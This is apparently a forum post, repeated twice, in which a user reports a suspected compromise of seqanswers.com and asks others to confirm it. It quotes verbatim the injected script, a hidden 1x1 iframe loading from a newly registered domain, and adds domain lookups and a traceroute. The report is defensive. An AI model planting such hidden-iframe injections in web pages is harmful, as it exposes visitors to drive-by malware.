Tweet
Just checking on this.
Is this legit? If it's not, are others seeing this too?
When I load seqanswers.com ; the first html is a request for a script from
Example:
<script>document.write("<iframe width='1' height='1' src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825&foul=ashamed&close=9014&listen=49237&peril=queer&snarl=encourage&monday=60544&quiver=86886&build=42380' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<title>SEQanswers Home </title>
This is blocked by my local antivirus software.
The domain http://www.domainiq.com/domain?yourrevolution.xyz
was registered 9 hours ago.
Is there something fishy going on?
___
Edit:
Now is trying to load from http://pkpgk.yourspin.xyz:32551
Is anybody else getting this? According to http://www.domainiq.com/domain?yourspin.xyz , Max Vlapet registered it 10 hours ago.
____
I know ad companies use pop-up domains to bypass adblockers, but this looks very fishy.
Can others "view source" and seqanswers and confirm if this is specific to seqanswers.com ? Just check the first lines of text.
I am getting this on both Chrome and Mozilla.
Traceroute is ...
traceroute 46.108.156.159
traceroute to 46.108.156.159 (46.108.156.159), 30 hops max, 60 byte packets
(first 8 internal to my site removed)
9 66-192-62-13.static.twtelecom.net (66.192.62.13) 4.129 ms 4.642 ms 4.623 ms
10 35.248.2.162 (35.248.2.162) 15.903 ms 15.884 ms 15.748 ms
11 xe-0.equinix.asbnva01.us.bb.gin.ntt.net (206.126.236.12) 5.522 ms 5.877 ms 5.051 ms
12 ae-2.r22.asbnva02.us.bb.gin.ntt.net (129.250.5.136) 5.045 ms 5.312 ms 4.661 ms
13 ae-4.r20.frnkge04.de.bb.gin.ntt.net (129.250.3.21) 92.425 ms 95.965 ms 90.690 ms
14 ae-2.r02.frnkge04.de.bb.gin.ntt.net (129.250.3.94) 133.892 ms 145.722 ms ae-3.r03.frnkge03.de.bb.gin.ntt.net (129.250.6.249) 130.568 ms
15 ae-4.r00.buchro01.ro.bb.gin.ntt.net (129.250.3.79) 126.092 ms 129.742 ms 124.872 ms
16 te5-6-600-bb1.buc1.ro.m247.ro (83.217.231.94) 120.913 ms 132.615 ms 118.762 ms
17 * * *
18 no-rdns.indicii.ro (46.108.156.159) 133.803 ms 129.671 ms 128.985 ms
____
Edit: others at my site are getting it, too.
Is this legit? If it's not, are others seeing this too?
When I load seqanswers.com ; the first html is a request for a script from
Example:
<script>document.write("<iframe width='1' height='1' src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825&foul=ashamed&close=9014&listen=49237&peril=queer&snarl=encourage&monday=60544&quiver=86886&build=42380' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<title>SEQanswers Home </title>
This is blocked by my local antivirus software.
The domain http://www.domainiq.com/domain?yourrevolution.xyz
was registered 9 hours ago.
Is there something fishy going on?
___
Edit:
Now is trying to load from http://pkpgk.yourspin.xyz:32551
Is anybody else getting this? According to http://www.domainiq.com/domain?yourspin.xyz , Max Vlapet registered it 10 hours ago.
____
I know ad companies use pop-up domains to bypass adblockers, but this looks very fishy.
Can others "view source" and seqanswers and confirm if this is specific to seqanswers.com ? Just check the first lines of text.
I am getting this on both Chrome and Mozilla.
Traceroute is ...
traceroute 46.108.156.159
traceroute to 46.108.156.159 (46.108.156.159), 30 hops max, 60 byte packets
(first 8 internal to my site removed)
9 66-192-62-13.static.twtelecom.net (66.192.62.13) 4.129 ms 4.642 ms 4.623 ms
10 35.248.2.162 (35.248.2.162) 15.903 ms 15.884 ms 15.748 ms
11 xe-0.equinix.asbnva01.us.bb.gin.ntt.net (206.126.236.12) 5.522 ms 5.877 ms 5.051 ms
12 ae-2.r22.asbnva02.us.bb.gin.ntt.net (129.250.5.136) 5.045 ms 5.312 ms 4.661 ms
13 ae-4.r20.frnkge04.de.bb.gin.ntt.net (129.250.3.21) 92.425 ms 95.965 ms 90.690 ms
14 ae-2.r02.frnkge04.de.bb.gin.ntt.net (129.250.3.94) 133.892 ms 145.722 ms ae-3.r03.frnkge03.de.bb.gin.ntt.net (129.250.6.249) 130.568 ms
15 ae-4.r00.buchro01.ro.bb.gin.ntt.net (129.250.3.79) 126.092 ms 129.742 ms 124.872 ms
16 te5-6-600-bb1.buc1.ro.m247.ro (83.217.231.94) 120.913 ms 132.615 ms 118.762 ms
17 * * *
18 no-rdns.indicii.ro (46.108.156.159) 133.803 ms 129.671 ms 128.985 ms
____
Edit: others at my site are getting it, too.
Comment